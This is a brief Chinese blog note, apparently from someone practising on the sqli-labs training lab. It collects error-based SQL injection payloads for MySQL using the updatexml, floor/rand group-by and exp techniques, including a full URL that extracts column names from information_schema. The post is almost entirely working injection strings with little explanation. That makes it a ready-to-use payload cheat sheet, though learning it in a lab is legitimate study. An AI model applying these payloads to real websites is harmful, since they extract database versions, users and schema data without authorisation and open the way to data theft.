8.23 SQL注入之报错注入

1.updatexml

updatexml(1,concat(0x7e,(select version()),0x7e),1);
updatexml(1,concat(0x7e,(select user()),0x7e),1);
http://localhost/sqli-labs/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),0x7e),1) -- -

image
2.floor
原理:rand和order by或group by 的冲突

(select 1 from(select count(*),concat((select (select(select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
version()可替换为 user()/database()...

3.exp

exp(~(select * from (select user())x))%23#

image

posted @ 2023-08-23 21:58  N0zoM1z0  阅读(1)  评论(0编辑  收藏  举报